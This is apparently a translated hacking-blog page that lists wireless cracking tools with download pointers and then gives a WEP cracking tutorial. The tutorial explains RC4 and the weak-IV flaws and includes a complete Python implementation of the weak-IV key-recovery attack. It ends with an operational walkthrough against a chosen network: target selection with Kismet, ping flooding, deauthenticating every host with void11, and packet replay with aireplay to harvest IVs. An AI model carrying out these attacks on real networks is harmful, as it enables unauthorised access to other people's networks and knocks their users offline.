WIRELESS HACKING TOOL

NetStumbler
NetStumbler (also known as Network Stumbler) is a tool for detecting wireless LANs that use the 802.11b, 802.11a and 802.11g WLAN standards. It runs on Microsoft Windows from Windows 98 through Windows Vista. There is also a version called MiniStumbler that runs on Windows CE, for use on handheld devices.

You can get it here

Aircrack: fastest WEP/WPA cracking tool. Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40-bit to 512-bit WEP key once enough encrypted packets have been collected. Aircrack can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files). You can get Aircrack here.
 

AirSnort: 802.11 WEP encryption cracking tool. AirSnort is a wireless LAN (WLAN) tool used to recover encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key once enough packets have been gathered. You can get AirSnort here.
 

Cowpatty: Cowpatty is a good tool for brute-forcing WPA-PSK, which is considered the "new WEP" for home wireless security. The program simply tries a series of candidates from a dictionary file to discover which one was set as the pre-shared key. You can get Cowpatty here.
 

Asleap: this tool is very good when the network uses LEAP. It gathers the authentication data being passed across the network, which can be sniffed and then cracked. LEAP does not protect the authentication exchange the way the other "real" EAP types do, which is the main reason LEAP is so easily broken. You can get Asleap here.
 

Ethereal: Ethereal is used all over the world, on Windows as well as on open-source operating systems, for troubleshooting, analysis, software and protocol development, and education. It has all the standard features you would expect in a protocol analyzer, plus several features not seen in any other product. Its open-source license allows those with the expertise to add enhancements.
You can download Ethereal here.
Others:

AiO Wireless Hack Tools 2009:

NetStumbler 0.4.0
Kismet 2005 2008 R
Wellenreiter v1.9
WEP Crack 0.1.0
AirSnort 0.2.7e
Wepwedgie 0.1.0 alpha
Hotspotter 0.4

Information Files:

Name: AIO Wireless Hack Tools 2009 Full
Size: 8.1 MB (recovery record 1%)
Language: Bahasa Indonesia
Support Platform: Linux, Windows.
Format: RAR
Download file:


WIRELESS HACKING TUTORIAL
WEP stands for Wired Equivalent Privacy. It has been the encryption standard for wireless networks up to now. Many people do not even use WEP, because of its weak security, the hassle, or because WEP is pointless anyway: it can be cracked, although it usually takes a while to collect enough data to recover the WEP key, especially when the key is long.
 

WEP consists of a secret key and the encryption. The secret key is shared between the access point and everyone on the wireless network, and is 5 or 13 characters long. The encryption process uses it to disguise every packet that travels across the WLAN, or Wireless Local Area Network. Each packet is encrypted uniquely and randomly, so if someone cracks the key for one packet, they cannot read the others without cracking them too.
 

This is all done by combining the secret key with three extra characters (the Initialization Vector, or IV) chosen at random by the wireless device. For example, if your key is "hello", the device may use "abchello" for one packet and "xyzhello" for another.
 

WEP also uses XOR, or Exclusive OR, for encryption. XOR compares two bits and returns 1 if they are different, 0 if they are the same. For example, 1 XOR 1 is 0, and 1 XOR 0 is 1.
An array is a variable that can hold multiple values. For example, an array declared as alphabet[26] holds 26 values, indexed 0 through 25.
Example:
 

char alphabet[26];
alphabet[0] = 'A';
alphabet[1] = 'B';

// Exchanges the contents of two array elements in place (C++ reference parameters).
void swap(char &first, char &second)
{
    char temp = first;
    first = second;
    second = temp;
}

swap(alphabet[0], alphabet[1]);   // now alphabet[0] == 'B' and alphabet[1] == 'A'

If the values in the array are swapped randomly many times, you can no longer tell which element holds which value.
 

The actual algorithm WEP uses to encrypt packets is RC4. RC4 consists of two steps: the Key Scheduling Algorithm and the Pseudo Random Generation Algorithm. The first part, the Key Scheduling Algorithm, or KSA, looks like this in C code, assuming k[] is an array holding the key (the IV followed by the secret key) and keylen is its length:

int n = 256;
unsigned char s[256];
// Initialization
for (int i = 0; i <= (n - 1); i++)
    s[i] = i;
int j = 0;
// Scrambling
for (int l = 0; l <= (n - 1); l++) {
    j = (j + s[l] + k[l % keylen]) % n;   // the key repeats; every value is reduced mod n
    swap(s[l], s[j]);
}
Let's examine the code above so that we understand it:
 

1. The integer 'n' determines how strong the encryption is. WEP uses 256.
2. The character array 'k' is the secret key combined with the three IV characters. It does not change at all in this program.
3. The '// Initialization' part simply fills the array with the characters 0 through 255.
4. The integer 'j' holds a value during the scrambling. It is always initialized to 0, because the scrambling must always start from 0.
5. Then (at '// Scrambling') the scrambling process begins. It turns the 's' array into a 'random' array, unlike the ordered 's' array it started from.
6. Inside the loop, the key (k) is first combined with the random array (s) to compute the index j. Then the call to swap() exchanges the array elements at positions l and j.
 

Now it is time for the second part of RC4, the Pseudo Random Generation Algorithm (PRGA). This part outputs the keystream, based on the pseudo-random array the KSA produced. The keystream is then merged with the cleartext data to create the encrypted data.
 

int i = 0;
int j = 0;
int z;
while (data_remaining) {
    i = (i + 1) % n;
    j = (j + s[i]) % n;
    swap(s[i], s[j]);
    z = s[(s[i] + s[j]) % n];
    // z is output here
    // and then XOR'd with the cleartext
}

1. The integers 'i' and 'j' are declared and initialized to 0.
2. A loop runs until the end of the packet data is reached.
3. 'i' is incremented on each iteration of the loop to keep it moving.
4. 'j' holds the pseudo-random number.
5. Another call to swap() exchanges the active characters s[i] and s[j].
6. 'z' is calculated by adding s[i] and s[j] and taking the value at the element with that index. The reason for this will be explained later.
7. 'z' is XOR'd with the cleartext to create the encrypted text.
 

CRC stands for Cyclic Redundancy Check. When packets are sent across the network, there must be a way for the receiving host to know that a packet has not been corrupted in any way. That is the purpose of the CRC. Before the data is sent, the CRC value, or checksum, is calculated for the packet and shipped along with it. On receipt, the target host computes a new CRC checksum. If the CRCs match, the integrity of the packet is confirmed.
 

In summary: the access point creates three pseudo-random characters (the IV). They are joined with the pre-chosen shared password to create the secret key. The KSA then uses this key to create a pseudo-random array, which the PRGA uses to create the keystream. The cleartext, together with the CRC checksum computed over it, is XOR'd with this keystream to create the encrypted data.
 

Then the receiving host decrypts. The characters added by the AP (the IV) are taken off the packet and merged with the shared password to rebuild the secret key. That key goes through the whole RC4 process, and the keystream is XOR'd with the encrypted text, producing the cleartext and its checksum. The checksum is removed, a new one is computed, and the two are compared to see whether the data is intact and came from the original sender.
Part II: Cracking WEP
Before we get to cracking WEP, let us discuss some flaws in the encryption process:


* There is about a 5% chance that the values in s[0] through s[3] will stay unchanged for the rest of the KSA after the first three iterations.
* The first value in the encrypted data is the SNAP header, which is 0xAA, or 170 in base 10. Sniffing the first byte of the encrypted text and XOR-ing it with 170 gives the first byte of the PRGA output (the keystream).
* A particular format of IV bytes sent by the AP shows that it is weak and easy to crack. This format is (B + 3, 255, X), where B is the index of the secret key byte being attacked and X can be anything.
 

We'll talk about the KSA now. Let us define some variables for the "test":
* The IV taken from the AP is 3, 255, 7. We sniffed it from the air. We will use it because the test above shows this IV is weak.
* The shared key is 22222. In practice, you will not know this.
* N is 256.
* If any value goes above 256, a modulo operation is performed on it and the resulting value is used.
* The array 's' has been initialized with the values 0 through 255.
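The following is an added example and not code from the original tutorial. It is a Python version of the KSA, PRGA and CRC framing from Part I, plus a simulation of the weak-IV attack built from the three flaws above, using the test values (IVs of the form 3, 255, X and the shared key 22222). It assumes that every frame starts with the SNAP byte 0xAA, that a simulated access point sends a frame under every IV of the form (A+3, 255, X) for each key byte index A, and that, as in the final step of the tutorial, the statistics are followed by a short brute force over the top candidates, checked against the CRC of a captured packet. All packet data here is constructed; nothing was captured from a real network.

```python
import zlib

SNAP_FIRST_BYTE = 0xAA   # first cleartext byte of every WEP data frame (SNAP header)

def ksa(key, steps=256):
    """Key-Scheduling Algorithm from Part I. Returns the state array s and the final j.
    steps < 256 runs only the first iterations: all an attacker can replay when it
    knows only part of the key (the IV plus the bytes recovered so far)."""
    s = list(range(256))                           # // Initialization
    j = 0
    for i in range(steps):                         # // Scrambling
        j = (j + s[i] + key[i % len(key)]) % 256   # key repeats; everything is mod 256
        s[i], s[j] = s[j], s[i]                    # swap()
    return s, j

def prga(s, length):
    """Pseudo-Random Generation Algorithm: returns `length` keystream bytes z."""
    s = s[:]                                       # work on a copy of the KSA state
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)

def rc4(key, data):
    """RC4 = KSA, then XOR the PRGA keystream with the data (encrypts and decrypts)."""
    s, _ = ksa(key)
    return bytes(b ^ k for b, k in zip(data, prga(s, len(data))))

def wep_encrypt(secret, iv, plaintext):
    """Framing as the text describes it: the CRC-32 checksum (ICV) is appended to the
    cleartext and the whole thing is RC4-encrypted under IV || secret."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return rc4(bytes(iv) + secret, plaintext + icv)

def wep_decrypt(secret, iv, ciphertext):
    """Receiver side: rebuild the session key from the IV, decrypt, split off the ICV
    and recompute it. Returns the cleartext, or None if the checksum differs."""
    body = rc4(bytes(iv) + secret, ciphertext)
    plaintext, icv = body[:-4], body[-4:]
    return plaintext if zlib.crc32(plaintext).to_bytes(4, "little") == icv else None

def fms_vote(iv, known, first_ct_byte):
    """One vote for secret byte A = len(known) from a packet whose IV has the weak
    form (A+3, 255, X). Returns None when this IV is not usable for byte A."""
    a = len(known)
    s, j = ksa(bytes(iv) + bytes(known), steps=a + 3)  # replay the KSA for i = 0 .. A+2
    t = s[1]
    if t == a + 3 or (t + s[t]) % 256 != a + 3:        # resolved condition: the PRGA's
        return None                                    # first output index must be A+3
    z = first_ct_byte ^ SNAP_FIRST_BYTE                # first keystream byte (flaw 2)
    # Step A+3 of the KSA swaps s[A+3] with s[j'], where j' = j + s[A+3] + K[A+3].
    # If positions 0, 1 and A+3 are not touched again (about 5% of IVs, flaw 1),
    # the first keystream byte is z = s[j'], so K[A+3] follows from z.
    return (s.index(z) - j - s[a + 3]) % 256

def rank_candidates(known, packets):
    """Vote over every weak-IV packet; return the 256 candidates for the next secret
    byte, most voted first. packets: list of (iv, ciphertext) as sniffed."""
    a = len(known)
    votes = [0] * 256
    for iv, ct in packets:
        if iv[0] == a + 3 and iv[1] == 255:
            guess = fms_vote(iv, known, ct[0])
            if guess is not None:
                votes[guess] += 1
    return sorted(range(256), key=lambda b: -votes[b])

def crack_wep(secret_len, packets, fudge=3):
    """Statistics plus the short brute force the tutorial mentions: try the top
    `fudge` candidates per byte, depth first, and accept the first complete key
    whose ICV verifies on a captured packet."""
    iv, ct = packets[0]                                # any full packet will do
    def search(known):
        if len(known) == secret_len:
            key = bytes(known)
            return key if wep_decrypt(key, iv, ct) is not None else None
        for b in rank_candidates(known, packets)[:fudge]:
            found = search(known + [b])
            if found is not None:
                return found
        return None
    return search([])

def simulate_attack(secret=b"22222"):
    """Constructed traffic, not a real capture: a simulated AP encrypts one SNAP-headed
    frame under every weak IV (A+3, 255, X). Only what a sniffer would see (IV and
    ciphertext) is handed to the attacker."""
    payload = bytes([SNAP_FIRST_BYTE]) + b"sample data"
    sniffed = []
    for a in range(len(secret)):
        for x in range(256):
            iv = (a + 3, 255, x)
            sniffed.append((iv, wep_encrypt(secret, iv, payload)))
    return crack_wep(len(secret), sniffed)

if __name__ == "__main__":
    print("recovered key:", simulate_attack())
```

Running the file prints the recovered key. The vote for key byte A only uses IVs of the form (A+3, 255, X); with the 5-character key there are 256 such IVs per byte, and on roughly one in twenty of them the formula in fms_vote returns the true byte, while the wrong values are spread thinly over the other 255 candidates. The CRC check at the end is what turns "most votes" into a confirmed key, which is also why the correct key byte only has to land in the top few candidates rather than strictly first.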
  

Open Kismet. Kismet is a free wireless scanner for Linux. When you open it, you will see a list of WLANs within range. Choose one and note the following four details (a target can be any of the host computers on that WLAN):
* AP MAC address
* MAC address of the target computer
* Whether WEP encryption is in use
* Wi-Fi channel used
  

Open Aircrack and start capturing packets. You will also capture the IVs, but it takes a long time. It can take several hours or even days to capture enough IVs to crack the WEP key.

Fortunately, we can speed this up. For example, if the WLAN is very busy there is more traffic, and therefore more packets carrying IVs, so the IVs are collected more easily. If we keep pinging the network, it will generate more data packets:

ping -t ip_address -l 50000

So what do we do now? We have only a little data, but we have to get the WEP key out of it. This is where void11 comes in. void11 deauthenticates all the hosts from the AP, cutting off every one of them. The first thing each host then does is automatically try to reconnect to the AP.

There is also another technique called a replay attack. It captures a packet from a host on the WLAN, then spoofs that host and replays the packet over and over again. This generates a very large amount of data traffic. The best program for this is aireplay; void11 is used alongside it for the deauthentication.

Open airodump. Now, thanks to the replay attack, IVs arrive at about 200 per second. You will probably have all the packets you need within 10 minutes. All the captured IVs are written to a file. Then open aircrack. Aircrack reads all the IVs from the capture file and performs statistical analysis on them, then brute forces the candidates that remain. Once it finds the key, it is displayed to you.
